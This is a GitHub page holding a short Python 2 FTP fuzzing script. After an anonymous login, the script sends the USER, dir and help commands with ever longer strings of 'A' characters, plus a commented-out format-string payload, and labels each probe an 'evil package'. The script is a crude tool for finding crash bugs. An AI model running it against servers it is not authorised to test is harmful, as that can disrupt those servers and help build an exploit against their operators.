-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathskeleton-ftp-fuzz.py
74 lines (53 loc) · 1.51 KB
/
skeleton-ftp-fuzz.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
c@kali:~/src/stif$ cat skeleton-ftp-fuzz.py
#!/usr/bin/env python
# skeleton-ftp-fuzz.py
#
# target - for your FTP server
# port - default : 21
#
# current commands that we will fuzz:
# user, dir, list, help, ..
#
import time
import sys,socket
target = sys.argv[1]
port = 21
print 'host: %s' % ( target )
# login in as anonymous
username = 'anonymous'
password = '[email protected]'
commands = [
'USER','dir','help'
]
for command in commands:
print '[+] fuzzing target with command : %s' % ( command )
payloads = [
'A'
#, '%x.'
]
multime = 1
while multime < 300:
for payload in payloads:
multime = multime + 1
try:
# create socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = s.connect(( target, port ))
output = s.recv(1024)
print '[+] socket created, connection output: ' + output
payload = payload * multime
print '[+] log me in...'
s.send('USER ' + username + '\r\n')
s.recv(1024)
s.send('PASS ' + password + '\r\n')
s.recv(1024)
print " [+] Sending our evil package: %s with payload length %s" % ( command, str(len(payload)))
s.send(command + " " + payload + "\r\n ")
output = s.recv(1024)
print " [+] Evil package sent."
print output
except:
print "[-] Error sending the evil package."
time.sleep(2)
s.close()
print '[+] It\'s done.'